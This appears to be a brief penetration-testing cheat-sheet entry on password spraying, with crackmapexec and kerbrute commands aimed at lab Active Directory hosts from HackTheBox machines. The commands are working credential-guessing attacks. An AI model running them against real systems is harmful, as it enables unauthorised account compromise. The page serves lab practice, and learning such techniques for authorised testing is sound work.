Password Spraying

21/01/2023

shuciran

Crackmapexec

While executing a Password Spraying attack with crackmapexec always run the --continue-on-success flag, sometimes there are some cases when two users can have the same password

  
crackmapexec winrm 10.10.10.248 -u users -p 'NewIntelligenceCorpUser9876' --continue-on-success

Examples: Intelligence

Kerbrute

Users file must be only the user not the domain (correct: ksimpson, incorrect: ksimpson@scrm.local)

  
kerbrute bruteuser --dc 10.10.11.168 -d scrm.local <users> <password>

12 Active Directory, AD - Enumeration

Reverse Shells
Finding GUID with ipainstaller
Plist Files
Signing IPA with Sideloadly (Non-jailbroken)
Signing IPA with TrollStore (Non-jailbroken)

exploitation wireless file transfer hackthebox active directory scr windows privesc mobile linux enumeration linux privesc

Password Spraying

Crackmapexec

Kerbrute

PowerView Modules

ASREPRoast Attack

Responder